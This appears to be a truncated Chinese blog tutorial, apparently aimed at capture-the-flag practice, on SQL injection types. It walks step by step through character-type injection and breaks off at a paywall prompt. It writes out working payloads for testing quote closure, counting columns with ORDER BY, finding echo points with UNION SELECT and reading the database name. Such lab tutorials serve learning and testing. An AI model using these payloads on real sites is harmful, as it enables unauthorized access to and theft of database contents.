本文详细介绍了SQL注入的四种类型:字符型、数字型、宽字节和POST注入。通过实例展示了如何判断注入类型、字段长度、回显点,以及如何查看数据库信息和表内容,最终获取flag。内容包括测试步骤、构造SQL语句的方法和观察结果。
一:字符型注入
当输入的参数为字符串时,称为字符型,需要用单引号来闭合。
初始页面是这样的:
第一步:判断注入类型
1.在name=root 后添加一个单引号使之变为name=root',发现页面返回错误:
说明存在注入。
2.接下来构造语句name=root' and '1'=1--+',页面返回正常:
将and '1'=1改成and '1'=2,发现页面返回错误:
说明这里的注入是字符型注入。
第二步:判断字段长
构造语句root' order by 5%23,页面返回正常:
将5改成6,则返回错误:
说明字段长是5.
第三步:判断回显点
构造语句:
root' union select 1,2,3,4,5%23
发现回显点是1,2,3
第四步:查看数据库信息
构造语句:
root' union select 1,database(),3,4,5%23
</
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
